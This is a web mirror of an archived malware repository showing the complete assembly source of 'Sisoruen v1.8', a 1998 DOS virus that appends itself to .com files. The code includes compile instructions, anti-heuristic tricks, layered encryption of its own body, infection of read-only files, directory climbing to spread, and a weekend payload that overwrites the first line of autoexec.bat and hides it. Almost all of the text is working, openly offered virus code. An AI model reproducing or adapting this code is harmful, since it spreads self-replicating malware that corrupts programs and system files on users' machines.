mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 18:36:10 +00:00
4b9382ddbc
push
282 lines
14 KiB
NASM
282 lines
14 KiB
NASM
; ------------------------------------------------------------------------- ;
|
|
; Sisoruen v1.8 coded by KilJaeden of the Codebreakers 1998 ;
|
|
; ------------------------------------------------------------------------- ;
|
|
; Description: `--------------------------------------| Size : 484 bytes ;
|
|
; | Type : COM Appender ;
|
|
; v1.0 - start with a simple *.com appender | Rate : All to Root ;
|
|
; v1.1 - lets do some XOR,NEG,NOT,ROR encryption! | DT : DotDot Style ;
|
|
; v1.2 - infect even read only files, restore stamps | Pload: autoexec.bat ;
|
|
; v1.3 - add anti-heuristic loop (credits to SPo0ky!) | Encrp: 4 times - ;
|
|
; v1.4 - don't infect files too small, or too big | XOR,NEG,NOT,ROR ;
|
|
; v1.5 - lets give it a payload, activate sat/sun `-------------------- ;
|
|
; v1.6 - optimized a WHOLE lot, and fixed an error that was bugging the ;
|
|
; - crap out of me -> Thanks to SPo0ky for pointing out that my 'safe' ;
|
|
; - place to store the DTA was getting destroyed by the encryption :) ;
|
|
; v1.7 - lets get some directory transversal going, dot dot style ;
|
|
; v1.8 - new payload this time, after it has infected all the .com's it can ;
|
|
; - get it's hands on, it jumps to c:\ and replaces the first line of ;
|
|
; - the "autoexec.bat" file, changing the normal dos prompt (c:\) to ;
|
|
; - c:\::Sisoruen::> !warning! -> it replaces the first line, so be ;
|
|
; - carefull, some people have important info on that first line hehe ;
|
|
; - Oh and it also makes the autoexec.bat read-only and hidden! :) ;
|
|
; - Hey, some people don't know how to un-readonly / un-hide a file... ;
|
|
; - Slows them down a little hehe ;
|
|
; ------------------------------------------------------------------------- ;
|
|
; --> This One's For :Mind Warp: Keep Up The Great Work, You Learn Fast! <--;
|
|
; ------------------------------------------------------------------------- ;
|
|
; to compile ::] tasm sisoruen.asm ;
|
|
; to link :::::] tlink /t sisoruen.asm ;
|
|
; ------------------------------------------------------------------------- ;
|
|
|
|
code segment ; name our segment code
|
|
assume cs:code,ds:code ; assign cs and ds to code
|
|
org 100h ; 100hex .com file
|
|
|
|
start:
|
|
db 0e9h,0,0 ; define a blank jump to next line
|
|
|
|
real_start:
|
|
mov cx,0ffffh ; from other anti-heuristics
|
|
|
|
anti_one:
|
|
jmp anti_two ; jump to anti two
|
|
mov ax,4c00h ; terminate program
|
|
int 21h ; terminate the program
|
|
|
|
anti_two:
|
|
loop anti_one ; loop anti_one
|
|
call get_delta ; push IP on to stack
|
|
|
|
get_delta:
|
|
pop bp ; pop it into bp
|
|
sub bp,offset get_delta ; get the delta offset
|
|
|
|
encrypt:
|
|
jmp not_on_first ; don't encrypt 1st run (overwritten)
|
|
lea si,[bp+encrypted] ; SI points to encrypted area start
|
|
mov di,si ; moves SI into DI
|
|
call encryption ; calls the encryption routine
|
|
jmp encrypted ; jump to start of encrypted area
|
|
|
|
encryption:
|
|
lodsb ; load a byte
|
|
not al ; encryptin 1
|
|
ror al,4 ; encryptin 2
|
|
neg al ; encryptin 3
|
|
xor al,byte ptr [bp+decrypt] ; encryptin 4 -final-
|
|
neg al ; unencrypt 3
|
|
ror al,4 ; unencrypt 2
|
|
not al ; unencrypt 1
|
|
stosb ; store the byte
|
|
loop encryption ; do it for all bytes
|
|
ret ; return from the call
|
|
|
|
decrypt db 0 ; our key value
|
|
|
|
encrypted:
|
|
lea si,[bp+thrbyte] ; where to put this
|
|
mov di,100h ; the starting location
|
|
push di ; 1 - push 100h until end
|
|
movsb ; move a byte
|
|
movsw ; and move a word
|
|
lea dx,[bp+offset dta] ; where we want to move the dta
|
|
mov ah,1ah ; move the dta
|
|
int 21h ; make it so DOS!
|
|
|
|
find_next:
|
|
mov ah,4eh ; find the first file with
|
|
lea dx,[bp+comfile] ; a *.com ending
|
|
mov cx,7 ; find even if +srh
|
|
|
|
infect_next:
|
|
int 21h ; make it so DOS!
|
|
jnc infect_file ; found one? infect it!
|
|
mov ah,3bh ; change directory
|
|
lea dx,[bp+dotdot] ; load up ".."
|
|
int 21h ; and change dir now
|
|
jnc find_next ; start infecting again
|
|
|
|
try_pay:
|
|
mov ah,2ah ; get system time
|
|
int 21h ; get the time now
|
|
cmp al,006h ; is it saturday?
|
|
je payload ; it is! I love the weekends
|
|
cmp al,00h ; is it sunday?
|
|
je payload ; it is! I love payloading weekends
|
|
|
|
end_virus:
|
|
mov dx,80h ; restore the dta
|
|
mov ah,1ah ; restore it now
|
|
int 21h ; make it so DOS!
|
|
retn ; 1 - return control to host
|
|
|
|
payload:
|
|
mov ah,0eh ; change drive
|
|
mov dl,2 ; to drive c:\
|
|
int 21h ; change it now!
|
|
|
|
mov ah,3bh ; change directory
|
|
lea dx,[bp+rootdir] ; load up "\"
|
|
int 21h ; and change dir now
|
|
|
|
mov ah,4eh ; find the first file
|
|
lea dx,[bp+autoexe] ; looking for "autoexec.bat" :)
|
|
mov cx,3 ; find it even if +rh
|
|
int 21h ; find the autoexec.bat!
|
|
jc end_virus ; none? end the virus
|
|
|
|
lea dx,[bp+offset dta+1eh] ; get the file info
|
|
push dx ; 7 - save that info for later
|
|
mov ax,4301h ; set file attributes
|
|
xor cx,cx ; to absolutely none
|
|
int 21h ; make it so DOS!
|
|
|
|
mov ax,3d02h ; open the autoexec.bat
|
|
int 21h ; open it / get info
|
|
xchg bx,ax ; exchange the info
|
|
|
|
call point_to_start ; point to start of file
|
|
|
|
mov ah,40h ; write to the autoexec.bat
|
|
lea dx,[bp+newprmt] ; write this
|
|
mov cx,cpend-cpstart ; this much
|
|
int 21h ; write it!
|
|
|
|
pop dx ; 7 - get the file info
|
|
mov ax,4301h ; set file attributes
|
|
mov cx,3 ; make it read only / hidden hehe
|
|
int 21h ; infect even read only now!
|
|
|
|
mov ah,3eh ; close the autoexec.bat
|
|
int 21h ; close it now bitch!
|
|
jmp end_virus ; jump to ending the virus
|
|
|
|
infect_file:
|
|
lea dx,[bp+offset dta+1eh] ; get the file info
|
|
push dx ; 2 - save it again for in a minute
|
|
mov ax,4301h ; set file attributes
|
|
xor cx,cx ; to absolutely none
|
|
int 21h ; infect even read only now!
|
|
|
|
mov ax,3d02h ; open the file read/write
|
|
pop dx ; 2 - use that info again!
|
|
int 21h ; make it so DOS!
|
|
xchg bx,ax ; move the file info
|
|
|
|
mov ax,5700h ; get the time / date
|
|
int 21h ; make it so DOS!
|
|
push dx ; 3 - save the value
|
|
push cx ; 4 - save this value too
|
|
|
|
mov ah,3fh ; read / record function
|
|
lea dx,[bp+thrbyte] ; where to write to
|
|
mov cx,3 ; how much to write
|
|
int 21h ; make it so DOS!
|
|
|
|
mov ax,word ptr [bp+dta+1ah] ; get the file size into ax
|
|
mov cx,word ptr [bp+thrbyte+1] ; get those recorded bytes
|
|
add cx,finished-real_start+3 ; get virus + jump size
|
|
cmp ax,cx ; compare the two
|
|
jz close_file ; if equal close up
|
|
cmp ax,61440 ; > then 61440 bytes?
|
|
ja close_file ; too big, close it
|
|
cmp ax,1000 ; < then 1000 bytes?
|
|
jb close_file ; too big, close it
|
|
|
|
sub ax,3 ; get the jump size
|
|
mov word ptr [bp+newjump+1],ax ; and write the jump
|
|
|
|
call point_to_start ; point to start of file
|
|
|
|
mov ah,40h ; write to file
|
|
mov cx,3 ; how much info? three bytes
|
|
lea dx,[bp+newjump] ; where the info starts
|
|
int 21h ; make it so DOS!
|
|
|
|
mov ax,4202h ; point to end of file
|
|
xor cx,cx ; cx to 0
|
|
cwd ; likewize for DX
|
|
int 21h ; make it so DOS
|
|
|
|
in al,40h ; get random value from clock
|
|
mov byte ptr [bp+decrypt],al ; save that value as our key
|
|
|
|
mov ah,40h ; write to file
|
|
lea dx,[bp+real_start] ; this is where we start
|
|
mov cx,encrypted-real_start ; write this much
|
|
int 21h ; write those bytes man!
|
|
|
|
lea di,[bp+finished] ; DI points to encrypted area end
|
|
push di ; 5 - save value for later
|
|
lea si,[bp+encrypted] ; SI points to encrypted area star
|
|
mov cx,finished-encrypted ; total # of bytes to encrypt
|
|
push cx ; 6 - save that for next routine
|
|
call encryption ; encrypt them now
|
|
|
|
mov ah,40h ; write to file
|
|
pop cx ; 6 - mov cx,finished-encrypted
|
|
pop dx ; 5 - lea dx,[bp+finished]
|
|
int 21h ; make it so DOS!
|
|
|
|
close_file:
|
|
mov ax,5701h ; restore time / date
|
|
pop cx ; 4 - restore from this value
|
|
pop dx ; 3 - restore from this one too
|
|
int 21h ; go for it!
|
|
|
|
mov ah,3eh ; close up the file
|
|
int 21h ; make it so DOS!
|
|
|
|
mov ah,4fh ; find next file
|
|
jmp infect_next ; and do it again
|
|
|
|
; ------------------------> Remote Calling Procedures <-------------------- ;
|
|
; ------------------------------------------------------------------------- ;
|
|
|
|
point_to_start:
|
|
mov ax,4200h ; point to start of file
|
|
xor cx,cx ; cx to 0
|
|
cwd ; likewize for DX
|
|
int 21h ; and point to the start
|
|
ret ; return from call
|
|
|
|
; -------------------------------> Data Area <----------------------------- ;
|
|
; ------------------------------------------------------------------------- ;
|
|
|
|
cpstart:
|
|
newprmt db 'prompt $p$f::Sisoruen::$g',0
|
|
db '',10,13,'$'
|
|
cpend:
|
|
|
|
dotdot db "..",0 ; define the .. string
|
|
rootdir db "\",0 ; define the \ string
|
|
autoexe db "autoexec.b*",0 ; look for autoexec.bat
|
|
comfile db "*.c*",0 ; define *.com string
|
|
thrbyte db 0cdh,20h,0 ; terminates on first run
|
|
newjump db 0e9h,0,0 ; a blank jump at first
|
|
dta db 42 dup (?) ; set up space for dta
|
|
finished label near ; an offset label
|
|
|
|
; ----------> Temporary Storage Area (Not Saved / Not Encrypted) <--------- ;
|
|
; ------------------------------------------------------------------------- ;
|
|
|
|
not_on_first:
|
|
lea di,[bp+encrypt] ; load DI with start address
|
|
lea si,[bp+newbytes] ; load SI with the new bytes
|
|
movsw ; move 2 bytes
|
|
movsb ; move 1 byte
|
|
jmp encrypted ; jump to start of encrypted area
|
|
|
|
newbytes:
|
|
mov cx,finished-encrypted ; overwrite the jmp with this line
|
|
|
|
; ---------------------------> It's All Over <----------------------------- ;
|
|
; ------------------------------------------------------------------------- ;
|
|
|
|
code ends ; end code segment
|
|
end start ; end / where to start
|
|
|
|
; ------------------------------------------------------------------------- ;
|
|
; ----------> How Can You Think Freely In The Shadow Of A Church <--------- ;
|
|
; ------------------------------------------------------------------------- ;
|